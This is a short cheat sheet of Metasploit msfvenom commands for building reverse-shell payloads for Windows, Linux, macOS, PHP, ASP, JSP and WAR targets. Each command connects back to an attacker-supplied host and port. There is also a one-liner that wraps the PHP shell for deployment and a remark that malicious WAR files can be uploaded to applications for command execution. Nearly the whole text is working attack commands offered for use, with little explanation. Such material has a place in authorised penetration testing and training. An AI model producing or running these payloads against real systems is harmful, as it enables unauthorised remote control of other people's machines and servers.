Cheatsheets

Cheatsheet: Metasploit Payloads

Windows

You can use the following command in order to create an EXE file for a Windows machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f exe > shell.exe

Linux

In order to gain access to a Linux host, an ELF file must be created. You can use the following line for that.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f elf > shell.elf

Mac

Mach-O, short for Mach object file format, is a file format for executables, object code, shared libraries, dynamically-loaded code, and core dumps. A replacement for the a.out format, Mach-O offers more extensibility and faster access to information in the symbol table. Mach-O is used by most systems based on the Mach kernel. A malicious macho file can be created using Metasploit by typing the following line of code.

msfvenom -p osx/x86/shell_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f macho > shell.macho

PHP

When you have access to a PHP Interpreter, you can always create a reverse shell with Metasploit using the following two lines. The second line is used to add the PHP tags into the shell.php

msfvenom -p php/meterpreter_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f raw > shell.php
cat shell.php | xclip -selection clipboard && echo "<?php " > shell.php && xclip -selection clipboard -o >> shell.php && echo && echo " ?>" >> shell.php

ASP

ASP and ASP.NET are server side technologies. Both technologies enable computer code to be executed by a web server. When a browser requests an ASP or ASP.NET file, the ASP engine reads the file, executes any code in the file, and returns the result to the browser. In order to create an ASP shell with Metasploit, you can use the following line.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f asp > shell.asp

JSP

JavaServer Pages (JSP) is a technology that helps software developers create dynamically generated web pages based on HTML, XML, or other document types. Released in 1999 by Sun Microsystems, JSP is similar to PHP, ASP and React’s JSX, but it uses the Java programming language. In order to create an JSP shell with Metasploit, you can use the following line.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f raw > shell.jsp

WAR

A web application archive (hereinafter WAR) is a simple JAR file used to distribute a collection of JSP, Java Servlets, Java classes and many other resources. An attacker can create a malicious WAR file and upload it to many applications in order to get back command execution (see Tomcat war file upload). In order to create a malicious WAR file using Metasploit you can use the following line of code.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f war > shell.war

References